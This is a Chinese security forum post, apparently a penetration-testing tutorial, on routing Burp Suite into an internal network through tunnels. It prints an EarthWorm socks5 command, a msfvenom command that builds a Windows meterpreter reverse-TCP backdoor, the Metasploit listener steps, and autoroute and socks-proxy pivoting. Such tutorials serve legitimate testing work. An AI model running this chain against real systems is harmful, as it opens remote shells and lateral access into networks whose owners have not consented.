安全矩阵

 找回密码
 立即注册
搜索
查看: 2632|回复: 0

burpsuite内网隧道设置

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-8-9 08:56:32 | 显示全部楼层 |阅读模式
原文链接:burpsuite内网隧道设置

burpsuite内网隧道设置

1
应用场景
burpsuite对内网的web系统进行漏洞扫描,或者进行测试,需要设置代理进行访问内网。
2
burpsuite设置socks5代理访问内网
使用ew开启socks5代理
ew_for_Win.exe-s ssocksd -l 1080

访问内网10段的80端口

3
burpsuite设置上游代理访问内网
在实际环境中,使用msf设置代理跨网段访问时,用的是socks4a模块现在的最新版本的msf这个工具已经把socks4a模块集合到socks模块里面。
代理的通信经过流程
本地
127.0.0.1:8080 ->localhost:25378->192.168.0.190 :1080->10.10.10.130:80
首先生成后门
msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.0.190  lport=4455 -fexe >r.exe
设置msf监听模块
  1. msfconsole
  2. use exploit/multi/handler
  3. set payload windows/meterpreter/reverse_tcp
  4. set lhost 192.168.0.190
  5. set lport 4455
  6. exploit
复制代码
设置web服务器
sudo python -m SimpleHTTPServer 80
设置路由
run autoroute -s 10.10.10.0/24
使用socks_proxy模块
  1. backgroupd
  2. useauxiliary/server/socks_proxy
  3. setversion 4a
  4. run
复制代码



使用SocksCap64设置代理隧道
192.168.0.190 1080

将火狐浏览器 代理到隧道中打开浏览目标网站
启动本地系统代理25378

设置顶级代理访问内网

抓包测试



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 16:34 , Processed in 0.013300 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表